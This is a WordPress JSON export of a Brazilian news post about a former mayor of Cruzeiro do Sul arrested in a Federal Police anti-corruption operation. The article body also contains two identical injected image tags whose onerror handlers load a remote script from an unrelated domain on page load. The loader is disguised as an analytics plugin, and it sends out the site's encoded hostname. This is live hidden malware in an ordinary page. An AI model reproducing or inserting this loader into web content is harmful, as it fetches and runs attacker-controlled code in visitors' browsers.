{"id":50045,"date":"2020-09-11T17:59:20","date_gmt":"2020-09-11T17:59:20","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/09\/11\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/"},"modified":"2020-09-11T17:59:20","modified_gmt":"2020-09-11T17:59:20","slug":"ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/","title":{"rendered":"Ex-prefeito de Cruzeiro do Sul \u00e9 preso em flagrante"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Pol\u00edcia Federal encontrou arma e animal silvestre em sua resid\u00eancia<\/span><\/p>\n<p style=\"text-align: justify;\">O ex-prefeito de Cruzeiro do Sul, Vagner Sales foi preso em flagrante durante a opera\u00e7\u00e3o da Pol\u00edcia Federal nesta sexta-feira (11), em sua resid\u00eancia.<\/p>\n<p style=\"text-align: justify;\">Enquanto cumpria um dos mandados de busca e apreens\u00e3o da Opera\u00e7\u00e3o Ac\u00faelo a Pol\u00edcia Federal encontrou uma arma e um animal silvestre na resid\u00eancia do ex-prefeito, o mesmo foi preso em flagrante.<\/p>\n<p style=\"text-align: justify;\">A Opera\u00e7\u00e3o Ac\u00faelo investiga envolvidos em crimes de fraude em licita\u00e7\u00e3o, lavagem de dinheiro, corrup\u00e7\u00e3o passiva e ativa, peculato, crime de responsabilidade de prefeito e organiza\u00e7\u00e3o criminosa praticados, em tese, pelo suposto grupo criminoso.<\/p>\n<p style=\"text-align: justify;\">Os policiais d\u00e3o cumprimento a 33 mandados judiciais, sendo 18 mandados de busca e apreens\u00e3o, 13 medidas cautelares substitutiva \u00e0 pris\u00e3o e 02 mandados de afastamento cautelar do cargo p\u00fablico.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\">&nbsp;<\/div><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Pol\u00edcia Federal encontrou arma e animal silvestre em sua resid\u00eancia<\/span><\/p>\n","protected":false},"author":4,"featured_media":50044,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-50045","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Ex-prefeito de Cruzeiro do Sul \u00e9 preso em flagrante - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ex-prefeito de Cruzeiro do Sul \u00e9 preso em flagrante - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Pol\u00edcia Federal encontrou arma e animal silvestre em sua resid\u00eancia\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-09-11T17:59:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/09\/11-09-2020_ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante.png\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/\",\"name\":\"Ex-prefeito de Cruzeiro do Sul \u00e9 preso em flagrante - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/09\/11-09-2020_ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante.png\",\"datePublished\":\"2020-09-11T17:59:20+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/09\/11-09-2020_ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante.png\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/09\/11-09-2020_ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante.png\",\"width\":458,\"height\":340,\"caption\":\"11-09-2020 ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ex-prefeito de Cruzeiro do Sul \u00e9 preso em flagrante\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ex-prefeito de Cruzeiro do Sul \u00e9 preso em flagrante - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/","og_locale":"pt_BR","og_type":"article","og_title":"Ex-prefeito de Cruzeiro do Sul \u00e9 preso em flagrante - Agazeta.net","og_description":"Pol\u00edcia Federal encontrou arma e animal silvestre em sua resid\u00eancia","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/","og_site_name":"Agazeta.net","article_published_time":"2020-09-11T17:59:20+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/09\/11-09-2020_ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante.png","type":"image\/png"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/","name":"Ex-prefeito de Cruzeiro do Sul \u00e9 preso em flagrante - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/09\/11-09-2020_ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante.png","datePublished":"2020-09-11T17:59:20+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/09\/11-09-2020_ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante.png","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/09\/11-09-2020_ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante.png","width":458,"height":340,"caption":"11-09-2020 ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/ex-prefeito-de-cruzeiro-do-sul-e-preso-em-flagrante\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Ex-prefeito de Cruzeiro do Sul \u00e9 preso em flagrante"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/50045","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=50045"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/50045\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/50044"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=50045"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=50045"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=50045"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}